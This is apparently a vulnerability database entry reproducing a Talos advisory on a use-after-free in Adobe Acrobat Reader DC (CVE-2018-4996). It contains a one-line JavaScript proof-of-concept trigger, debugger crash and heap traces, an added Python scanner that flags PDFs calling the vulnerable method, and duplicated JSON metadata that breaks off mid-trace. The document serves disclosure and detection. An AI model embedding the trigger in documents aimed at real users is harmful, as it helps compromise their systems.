Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability (CVE-2018-4996)
2018-05-17T00:00:00
ID: SSV:97293 | Type: seebug | Reporter: Knownsec | Modified: 2018-05-17T00:00:00
Description
Summary
A specific JavaScript script embedded in a PDF file can cause a pointer to a previously freed object to be reused when the PDF document is opened in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.
Tested Versions
Adobe Acrobat Reader DC 2018.009.20044
Product URLs
https://get.adobe.com/reader/
CVSSv3 Score
7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-416: Use After Free
Details
Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually the default PDF reader on systems, and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports JavaScript embedded in the PDF to allow for interactive PDF forms. This gives a potential attacker the ability to precisely control memory layout and adds attack surface. When the following piece of JavaScript is executed in a suitable PDF document, a use-after-free condition can be triggered:
```
try{this.Net.Discovery.queryServices( "", {} ); }catch(e){app.alert(e);}
```
With page heap enabled, this leads to a crash:
```
eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0
eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
Annots!PlugInMain+0x9ea60:
520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????
0:000>
```
The memory pointed to by `ebx` is freed and invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.
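For triage of incoming documents, a static check for PDFs that call this method, added here as an example (it is not code from the advisory or from Adobe). It walks PDF objects, decodes inline `/JS` strings and Flate-compressed streams, and reports each `Net.Discovery.queryServices` call and whether its first argument is an empty string; the function names and `SAMPLE` are constructed for illustration, and object streams and encrypted documents are not handled.

```python
import re
import zlib

# Privileged method named in the advisory; also captures a quoted first argument.
API_CALL = re.compile(
    r"""Net\s*\.\s*Discovery\s*\.\s*queryServices\s*\(\s*(?P<arg>"[^"]*"|'[^']*')?"""
)
OBJ = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
STREAM = re.compile(rb"stream\r?\n(.*?)\r?\n?endstream", re.S)
JS_KEY = re.compile(rb"/JS\s*(?=[(<])")
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def decode_names(raw):
    """Undo #xx escapes so a key written as /J#53 is read as /JS."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)


def read_literal(buf, i):
    """Decode the PDF literal string whose opening '(' is at buf[i]."""
    depth, out = 0, bytearray()
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b"\\":
            octal = re.match(rb"[0-7]{1,3}", buf[i + 1:i + 4])
            if octal:  # \ddd octal escape
                out.append(int(octal.group(), 8) & 0xFF)
                i += 1 + len(octal.group())
            else:  # \n, \(, \\ and similar
                nxt = buf[i + 1:i + 2]
                out += ESCAPES.get(nxt, nxt)
                i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                break
        if not (c == b"(" and depth == 1):  # skip only the opening parenthesis
            out += c
        i += 1
    return bytes(out)


def to_text(raw):
    """UTF-16BE when a BOM is present, otherwise one byte per character."""
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", "replace")
    return raw.decode("latin-1")


def scripts_in(body):
    """Yield (where, text) for inline /JS strings and for the stream of one object."""
    m = STREAM.search(body)
    head = decode_names(body[:m.start()] if m else body)
    for key in JS_KEY.finditer(head):
        if head[key.end():key.end() + 1] == b"(":
            yield "JS string", to_text(read_literal(head, key.end()))
            continue
        hexstr = re.match(rb"<([0-9A-Fa-f\s]*)>", head[key.end():])
        if hexstr:
            digits = re.sub(rb"\s", b"", hexstr.group(1))
            if len(digits) % 2:
                digits += b"0"  # PDF syntax pads an odd final digit with 0
            yield "JS hex string", to_text(bytes.fromhex(digits.decode()))
    if m:
        data = m.group(1)
        if b"FlateDecode" in head:
            try:  # decompressobj tolerates a clipped trailer or trailing bytes
                data = zlib.decompressobj().decompress(data)
            except zlib.error:
                pass  # keep the raw bytes so a damaged stream does not stop the scan
        yield "stream", to_text(data)


def scan_pdf(data):
    """Return one finding per queryServices call found in any script-bearing object."""
    findings = []
    for obj in OBJ.finditer(data):
        for where, text in scripts_in(obj.group(2)):
            for call in API_CALL.finditer(text):
                arg = call.group("arg")
                # The advisory's trigger passes an empty (invalid) service name.
                empty = arg is not None and arg[1:-1] == ""
                findings.append({"obj": int(obj.group(1)), "where": where, "empty_service_name": empty})
    return findings


# Constructed object fragments for the demo (not a complete, openable PDF).
_PACKED = zlib.compress(b"this . Net . Discovery . queryServices ( 'example-service' , {} );")
SAMPLE = (
    b'1 0 obj\n<< /S /JavaScript /JS (try{this.Net.Discovery.queryServices( "", {} ); }'
    b"catch(e){app.alert(e);}) >>\nendobj\n"
    b"2 0 obj\n<< /S /JavaScript /JS 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /Filter /FlateDecode >>\nstream\n" + _PACKED + b"\nendstream\nendobj\n"
    b"4 0 obj\n<< /S /JavaScript /J#53 <6170702e616c6572742822686922293b> >>\nendobj\n"
)
```

`scan_pdf(SAMPLE)` reports object 1 (inline string, empty service name) and object 3 (compressed stream, non-empty name). Indirect `/JS n 0 R` references are covered because every stream is scanned.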
If we track back the allocations, we can see that the pointer in `ebx` is actually used as `this` in previous function calls. The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:
```
0:000> !heap -p -a eax
    address 292c2fd0 found in
    _DPH_HEAP_ROOT @ 191000
    in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
    292215b0: 292c2fd0 30 - 292c2000 2000
    6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77276206 ntdll!RtlDebugAllocateHeap+0x00000030
    7723a127 ntdll!RtlpAllocateHeap+0x000000c4
    77205950 ntdll!RtlAllocateHeap+0x0000023a
    62f8ed43 MSVCR120!malloc+0x00000049
    55848b02 Annots!PlugInMain+0x00004c01
    55848ab1 Annots!PlugInMain+0x00004bb0
    55a4ba1b Annots!PlugInMain+0x00207b1a
    558e1e29 Annots!PlugInMain+0x0009df28
    558e2308 Annots!PlugInMain+0x0009e407
    56b4267d EScript!mozilla::HashBytes+0x0004201b
    56b275b6 EScript!mozilla::HashBytes+0x00026f54
    56b217c2 EScript!mozilla::HashBytes+0x00021160
    56b205f0 EScript!mozilla::HashBytes+0x0001ff8e
    56b204fb EScript!mozilla::HashBytes+0x0001fe99
    56b20442 EScript!mozilla::HashBytes+0x0001fde0
    56b09e18 EScript!mozilla::HashBytes+0x000097b6
    56b48697 EScript!mozilla::HashBytes+0x00048035
    56b4841a EScript!mozilla::HashBytes+0x00047db8
    56b47e8d EScript!mozilla::HashBytes+0x0004782b
    56b46d7f EScript!mozilla::HashBytes+0x0004671d
    56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d
    6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf
    60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd
    601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31
    5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618
    5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16
    601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a
    5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f
    5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b
    5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b
    5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231
```
Setting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:
```
0:000> ba w 4 292c2ffc
0:000> dd 292c2ffc
0:000> g
Breakpoint 6 hit
eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0
eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
Annots!PlugInMain+0x205507:
55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)
0:000> dd 292c2ffc
292c2ffc 29d26fe0 ???????? ???????? ????????
0:000> !heap -p -a 29d26fe0
    address 29d26fe0 found in
    _DPH_HEAP_ROOT @ 191000
    in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
    2a3221d4: 29d26fe0 1c - 29d26000 2000
    6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77276206 ntdll!RtlDebugAllocateHeap+0x00000030
    7723a127 ntdll!RtlpAllocateHeap+0x000000c4
    77205950 ntdll!RtlAllocateHeap+0x0000023a
    62f8ed43 MSVCR120!malloc+0x00000049
    55848b02 Annots!PlugInMain+0x00004c01
    55848ab1 Annots!PlugInMain+0x00004bb0
    558e22e7 Annots!PlugInMain+0x0009e3e6
    56b4267d EScript!mozilla::HashBytes+0x0004201b
    56b275b6 EScript!mozilla::HashBytes+0x00026f54
    56b217c2 EScript!mozilla::HashBytes+0x00021160
    56b205f0 EScript!mozilla::HashBytes+0x0001ff8e
    56b204fb EScript!mozilla::HashBytes+0x0001fe99
    56b20442 EScript!mozilla::HashBytes+0x0001fde0
    56b09e18 EScript!mozilla::HashBytes+0x000097b6
    56b48697 EScript!mozilla::HashBytes+0x00048035
    56b4841a EScript!mozilla::HashBytes+0x00047db8
    56b47e8d EScript!mozilla::HashBytes+0x0004782b
    56b46d7f EScript!mozilla::HashBytes+0x0004671d
    56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d
    6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf
    60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd
    601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31
    5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618
    5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16
    601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a
    5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f
    5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b
    5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b
    5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231
    5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4
    5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158
```
This 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:
```
(c20.5e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0
eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
Annots!PlugInMain+0x9ea60:
558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????
0:000> dd ebx
29d26fe0 ???????? ???????? ???????? ????????
29d26ff0 ???????? ???????? ???????? ????????
29d27000 ???????? ???????? ???????? ????????
29d27010 ???????? ???????? ???????? ????????
29d27020 ???????? ???????? ???????? ????????
29d27030 ???????? ???????? ???????? ????????
29d27040 ???????? ???????? ???????? ????????
29d27050 ???????? ???????? ???????? ????????
```
With page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.
Note that for the PoC to trigger this memory corruption, the PoC file needs to be added to the trusted locations list under “Security (Enhanced)” in preferences.
Timeline
2018-01-23 - Vendor Disclosure
2018-05-15 - Public Release
{"id": "SSV:97293", "type": "seebug", "bulletinFamily": "exploit", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability(CVE-2018-4996)", "description": "### Summary\r\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\r\n\r\n### Tested Versions\r\nAdobe Acrobat Reader DC 2018.009.20044\r\n\r\n### Product URLs\r\nhttps://get.adobe.com/reader/\r\n\r\n### CVSSv3 Score\r\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. 
When executing a following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\r\n```\r\ntry{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\r\n```\r\n\r\nWith page heap enabled, this leads to a crash:\r\n```\r\neax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\r\neip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\r\n0:000>\r\n```\r\n\r\nThe memory pointed to by `ebx` is freed an invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.\r\n\r\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. 
The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\r\n```\r\n0:000> !heap -p -a eax\r\n address 292c2fd0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 292215b0: 292c2fd0 30 - 292c2000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 55a4ba1b Annots!PlugInMain+0x00207b1a\r\n 558e1e29 Annots!PlugInMain+0x0009df28\r\n 558e2308 Annots!PlugInMain+0x0009e407\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 
AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n```\r\nSetting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:\r\n```\r\n0:000> ba w 4 292c2ffc\r\n0:000> dd 292c2ffc\r\n0:000> g\r\nBreakpoint 6 hit\r\neax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\r\neip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nAnnots!PlugInMain+0x205507:\r\n55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\r\n0:000> dd 292c2ffc\r\n292c2ffc 29d26fe0 ???????? ???????? ????????\r\n0:000> !heap -p -a 29d26fe0\r\n address 29d26fe0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 558e22e7 Annots!PlugInMain+0x0009e3e6\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d 
AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\r\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\r\n```\r\nThis 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:\r\n```\r\n(c20.5e8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\r\neip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\r\n0:000> dd ebx\r\n29d26fe0 ???????? ???????? ???????? ????????\r\n29d26ff0 ???????? ???????? ???????? ????????\r\n29d27000 ???????? ???????? ???????? ????????\r\n29d27010 ???????? ???????? ???????? ????????\r\n29d27020 ???????? ???????? ???????? ????????\r\n29d27030 ???????? ???????? ???????? ????????\r\n29d27040 ???????? ???????? ???????? ????????\r\n29d27050 ???????? ???????? ???????? ????????\r\n```\r\n\r\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. 
With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\r\n\r\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to trusted locations list in \u201cSecurity(Enhanced)\u201d in preferences.\r\n\r\n### Timeline\r\n* 2018-01-23 - Vendor Disclosure\r\n* 2018-05-15 - Public Release", "published": "2018-05-17T00:00:00", "modified": "2018-05-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.seebug.org/vuldb/ssvid-97293", "reporter": "Knownsec", "references": [], "cvelist": ["CVE-2018-4996"], "lastseen": "2018-06-08T07:10:05", "viewCount": 6, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2018-06-08T07:10:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-4996"]}, {"type": "talos", "idList": ["TALOS-2018-0517"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813233", "OPENVAS:1361412562310813238", "OPENVAS:1361412562310813232", "OPENVAS:1361412562310813230", "OPENVAS:1361412562310813231", "OPENVAS:1361412562310813239"]}, {"type": "nessus", "idList": ["ADOBE_READER_APSB18-09.NASL", "MACOSX_ADOBE_READER_APSB18-09.NASL", "ADOBE_ACROBAT_APSB18-09.NASL", "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL"]}, {"type": "kaspersky", "idList": ["KLA11252"]}], "modified": "2018-06-08T07:10:05", "rev": 2}, "vulnersScore": 6.0}, "sourceHref": "", "sourceData": "", "status": "cve,details"}
{"cve": [{"lastseen": "2021-02-02T06:52:39", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4996", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4996"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4996", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", 
"cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}], "talos": [{"lastseen": "2019-05-29T19:19:55", "bulletinFamily": "info", "cvelist": ["CVE-2018-4996"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0517\n\n## Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability\n\n##### May 15, 2018\n\n##### CVE Number\n\nCVE-2018-4996\n\n### Summary\n\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.009.20044\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. 
When executing a following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\n \n \n try{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\n \n\nWith page heap enabled, this leads to a crash:\n \n \n eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\n eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\n 0:000>\n \n\nThe memory pointed to by `ebx` is freed an invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.\n\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. 
The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\n \n \n 0:000> !heap -p -a eax\n address 292c2fd0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 292215b0: 292c2fd0 30 - 292c2000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 55a4ba1b Annots!PlugInMain+0x00207b1a\n 558e1e29 Annots!PlugInMain+0x0009df28\n 558e2308 Annots!PlugInMain+0x0009e407\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb 